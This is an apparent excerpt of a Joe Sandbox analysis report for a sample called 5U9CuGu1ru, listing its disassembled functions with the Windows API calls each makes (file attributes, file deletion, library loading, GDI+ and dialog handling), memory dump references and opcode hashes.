GetCurrentProcess.KERNEL32(?,?), ref: 00810915
GetProcessAffinityMask.KERNEL32(00000000), ref: 0081091C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 4128fe706283962a088298e2fe16d15295ee96feed1ddcf888f29f2190723334
Instruction ID: 7dae5ea3e7ffabf9f9ccafa382a61cb9af6fb3f2e264df6af6517986e41349da
Opcode Fuzzy Hash: 4128fe706283962a088298e2fe16d15295ee96feed1ddcf888f29f2190723334
Instruction Fuzzy Hash: 68E09232A11109BB6F09CAB49C248FB7B9DFF442147204579A80AD7201F970DEC18EA0

Function 0080A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A489

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ae27ff8c8d6bbb81a25fca49352105e3814bc580a6b86dfbb7e9e00f665c8b47
Instruction ID: 98f5338d048695be27ee354486da6a90219f8a8b1d888b7b8fd7b187a0e6596b
Opcode Fuzzy Hash: ae27ff8c8d6bbb81a25fca49352105e3814bc580a6b86dfbb7e9e00f665c8b47
Instruction Fuzzy Hash: 60F0A03524120D7BEF015F60DC45FD9776CFF04382F048051BC88E61A1DB728AA9AA51

Function 0081D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0081D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0081D5B8

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 84e2973a5064b63b12716fe66360d1183580de4c39619a291c0bb73abacae4d5
Instruction ID: 1836f973459712fc4309bc37ff2bfff622a5958b45f6a341a1ba49ff8fdb7789
Opcode Fuzzy Hash: 84e2973a5064b63b12716fe66360d1183580de4c39619a291c0bb73abacae4d5
Instruction Fuzzy Hash: 9BF0A072504348AAEB11ABA49C06FEE775DFB05745F040995BB00E30A2DA716AA08662

Function 0080A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0080984C,?,?,00809688,?,?,?,?,00831FA1,000000FF), ref: 0080A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0080984C,?,?,00809688,?,?,?,?,00831FA1,000000FF), ref: 0080A16C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 51a69a92d2dccdd898a408c7c72a4d65822408b71dc4c8846b7e059a84889dd1
Instruction ID: 136bd5f4f6066db03808217507f7ce85e56ae7e6b5f9e7350dac99e380713c80
Opcode Fuzzy Hash: 51a69a92d2dccdd898a408c7c72a4d65822408b71dc4c8846b7e059a84889dd1
Instruction Fuzzy Hash: 8FE092356402086BDB119F64DC41FE9776CFF08382F484065BC88D31A0DB629ED4AA91

Function 0081A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00831FA1,000000FF), ref: 0081A3D1
CoUninitialize.COMBASE(?,?,?,?,00831FA1,000000FF), ref: 0081A3D6

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 094129aa93b10998413dd0ebe5a2e41f4124fd340f67b9d4fcbbe378dc702ba1
Instruction ID: c596c702337efce4d1517ad8e682be93cacdf0f8014cf6d744ef174bcf045238
Opcode Fuzzy Hash: 094129aa93b10998413dd0ebe5a2e41f4124fd340f67b9d4fcbbe378dc702ba1
Instruction Fuzzy Hash: A7F03932618A54EFC710AB4CDC05B5AFBACFB89B20F04436AF419C3B60CB796800CAD1

Function 0080A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0080A189,?,008076B2,?,?,?,?), ref: 0080A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0080A189,?,008076B2,?,?,?,?), ref: 0080A1D1

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 076455675fc6a89c6aa993e9f0cec69e1cacc07ea010f8408d62820503ac4950
Instruction ID: b404c9d5a53e74482612e9c73625018e5bf35cc672743b0168376bf355152896
Opcode Fuzzy Hash: 076455675fc6a89c6aa993e9f0cec69e1cacc07ea010f8408d62820503ac4950
Instruction Fuzzy Hash: E7E092355001285BDB60AB68DC05BD9B76CFB083E1F0042A1FD55E32E0D7719E889AE1

Function 00810085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 6278da46afcf6bd2023a9c8d25951973915cf57b882f59590eb82c185aecce7d
Instruction ID: 74776f6e9f9322874e6eaf94c4f840b61aeea3a7739b714feaecaef3a46a1a40
Opcode Fuzzy Hash: 6278da46afcf6bd2023a9c8d25951973915cf57b882f59590eb82c185aecce7d
Instruction Fuzzy Hash: D3E0127690151C6ADB219AA4AC05FD6B76CFF0D392F0404A5B948D3154DA749A848BA1

Function 00819B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00819B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00819B37

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 0b18284a0dac53eb128461b173c823d988c3f1f9e719af0cd18dc0c5dc326dea
Instruction ID: 4e41db1019312382d5e4d59a4eb590bf29c55ec27d70146cb82f7cdb480124b0
Opcode Fuzzy Hash: 0b18284a0dac53eb128461b173c823d988c3f1f9e719af0cd18dc0c5dc326dea
Instruction Fuzzy Hash: 4DE0ED71905218EBDB10DF99D5016D9B7ECFF09721F20805BFC99D3200E671AE84DB91

Function 0082215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0082329A: try_get_function.LIBVCRUNTIME ref: 008232AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0082217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00822185

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: d065fe563dd4271175f6828d81d643936529666fd82960afc132cb50b53e4163
Instruction ID: a62b0f6f0c215c04b88586ae9a53840987f327da4b5a555c04d284496a8f274d
Opcode Fuzzy Hash: d065fe563dd4271175f6828d81d643936529666fd82960afc132cb50b53e4163
Instruction Fuzzy Hash: B7D0A724504735343D0426B83857D983344F851B743F00A45E330C51D1FF1861D06013

Function 0081DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 0081DC73
DloadProtectSection.DELAYIMP ref: 0081DC8F

Part of subcall function 0081DE67: DloadObtainSection.DELAYIMP ref: 0081DE77

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 1c4cbd5fbcd6308fb25442ee8237fc34eecec2bb00e3f53ac0d5ff6c092fabca
Instruction ID: 5f1e016d3458ebac366201d0df4babb303de4ad608ed27b5aa19edcc0b98b067
Opcode Fuzzy Hash: 1c4cbd5fbcd6308fb25442ee8237fc34eecec2bb00e3f53ac0d5ff6c092fabca
Instruction Fuzzy Hash: 4DD012B01403018AC615EB18B9467DD337CFF04748FA52A01F105C72A0DFF854C1CA4A

Function 008012E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 008012FB
ShowWindow.USER32(00000000), ref: 00801302

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 9d360f8f06e9b8ea462e650e40240bb7fad92eabe90bbfb06988b78184b018fb
Instruction ID: ec055d225a6de4bbb5dbe045b16730d1ac9cb604ad5e2e1e14774e35b7f1b785
Opcode Fuzzy Hash: 9d360f8f06e9b8ea462e650e40240bb7fad92eabe90bbfb06988b78184b018fb
Instruction Fuzzy Hash: 93C0123205C600BFCB020BB0DC09D2FBBA8BBA6212F06C948F2A5C0060C238C010DB11

Function 008019A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008019AB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5957087ce97491a89643b771b3997f236761280d7c41011b7dc2eef87049bd9
Instruction ID: 231e15b4468a13a27d198c7459656a2129d086bbbc5ec5a935000eac13efe4d3
Opcode Fuzzy Hash: e5957087ce97491a89643b771b3997f236761280d7c41011b7dc2eef87049bd9
Instruction Fuzzy Hash: 3AC1A130A042549FEF55CF68CC98BA97BA5FF0A324F0844B9EC46DB2C6CB759944CB61

Function 00803B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00803B42

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ad48208263684153754182374eb82275626e8e791469750926bf77ae0933d7e3
Instruction ID: 83daa4b8e043d82be091761a57ee238d7786c51b251cea73a19073be16261367
Opcode Fuzzy Hash: ad48208263684153754182374eb82275626e8e791469750926bf77ae0933d7e3
Instruction Fuzzy Hash: CF71AE71104B44AEDB65DB74CC51AE7B7ECFF14301F44496EE5AAC7282DA326A48CF12

Function 0080837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00808384

Part of subcall function 00801380: __EH_prolog.LIBCMT ref: 00801385
Part of subcall function 00801380: new.LIBCMT ref: 008013FE

Part of subcall function 008019A6: __EH_prolog.LIBCMT ref: 008019AB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6766383c307a608132c382b8dbf6386821a473d896e7537c1a7ac182aefbea0b
Instruction ID: c084c2bccd14335952a42cd2aaa4eca60e653639808ee946b63dc8c6755baf63
Opcode Fuzzy Hash: 6766383c307a608132c382b8dbf6386821a473d896e7537c1a7ac182aefbea0b
Instruction Fuzzy Hash: DD41BE31900A589ADF60EB64CC55BEAB3A8FF50310F0440EAA58AE30D3DF745AC8DB51

Function 00801E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00801E05

Part of subcall function 00803B3D: __EH_prolog.LIBCMT ref: 00803B42

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6c75c4f5ac73634608c2f1cc8e091d3a3c4da049f5331dc2bf0447a4a424b63d
Instruction ID: 9e2085ce71549c6d3a394472eb6d59062ad647a45e5ab33fcc2ed52d6e0e7c75
Opcode Fuzzy Hash: 6c75c4f5ac73634608c2f1cc8e091d3a3c4da049f5331dc2bf0447a4a424b63d
Instruction Fuzzy Hash: A72126729041089FCF55EF98DD599EEBBFAFF58314B1000ADE845A7291CB325E50CB61

Function 0081A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0081A7C8

Part of subcall function 00801380: __EH_prolog.LIBCMT ref: 00801385
Part of subcall function 00801380: new.LIBCMT ref: 008013FE

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 576782b3898ce7a46832cb04b427318a4d812ea8d5af89587818daf4e5af16cf
Instruction ID: 868e39e1964403cd08f14bf6048cbb45135ffeb401da0aa574ccb99bde8c30d0
Opcode Fuzzy Hash: 576782b3898ce7a46832cb04b427318a4d812ea8d5af89587818daf4e5af16cf
Instruction Fuzzy Hash: E6216D71C052499ECF19DF98C9529EEB7B8FF19314F0004AAE809E7242DB356E46CB62

Function 008092E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008092EB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: eda3bfe8eed8dc2dea0979f76f96f0839f16ab0612ad9ab6d71a4dd7a565a7a1
Instruction ID: 11def881f3d1457cf8b2d7bf89b1acbe9ff6b78d8165a9ab1d720eaa6d1abf46
Opcode Fuzzy Hash: eda3bfe8eed8dc2dea0979f76f96f0839f16ab0612ad9ab6d71a4dd7a565a7a1
Instruction Fuzzy Hash: A8117C73E005289BCF62AFACCC529DEB736FF88750F054215F844E72D2CA349D108AA1

Function 0080AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0080AA9A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: f6d8b0dc9e84eacb7284fa4d79b427754060b167606724acbcaf2778bae0ffab
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 72F081306107159FDBB8DA68CD4575677D8FB15330F20891AE496C66C0E770D880C752

Function 00805BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00805BDC

Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

